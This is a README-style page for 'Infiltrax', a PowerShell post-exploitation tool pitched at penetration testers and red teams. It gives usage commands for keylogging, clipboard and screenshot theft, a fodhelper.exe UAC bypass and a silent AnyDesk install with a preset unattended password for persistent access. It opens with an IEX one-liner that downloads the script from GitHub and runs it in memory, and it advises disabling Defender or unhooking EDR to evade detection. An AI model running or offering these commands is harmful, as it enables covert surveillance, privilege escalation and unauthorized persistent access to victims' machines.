InfiltraxInfiltrax: UAC Bypass, Keylogging, and Persistent Access for Penetration Testers
Infiltrax
Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access.
Feature
- Screenshot Capture: Take screenshots of the entire screen and save them as PNG files.
- Clipboard Retrieval: Access the current clipboard contents.
- Keystroke Logging: Record keystrokes for a specified duration.
- UAC Bypass: Bypasses UAC via fodhelper.exe
- AnyDesk Installation: Install and configure AnyDesk with unattended access.
Use
- Execute directly into memory
C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString(‘https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1‘)
- Get Clipboard contents
C:\Users\Administrator\Desktop> Invoke-Clipboard
- Take desktop screenshot and save into certain location
C:\Users\Administrator\Desktop> Invoke-Screenshot –Path “C:\Windows\Tasks\“
- Capture user keystrokes and save in a file
C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture –DurationInSeconds 30 –OutputPath C:\Users\Vlex\Desktop\keystrokes.txt
-
Bypass UAC to run any program in elevated context. Default program powershell.exe
This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692 all credit goes to netbiosX :). Spawnning cmd.exe or powersell.exe from script gets caught by behavioural detection disable defender or unhook EDR first.
C:\Users\Vlex\Desktop> Invoke-FodHelperBypass –program “calc.exe“
- Installs anydesk silently, sets up unattended access and gets remote id (Requires Administrative Privilege)
C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall –InstallPath “C:\Users\Alex\AppData\Local\AnyDesk“ –Password “Unattended123!“
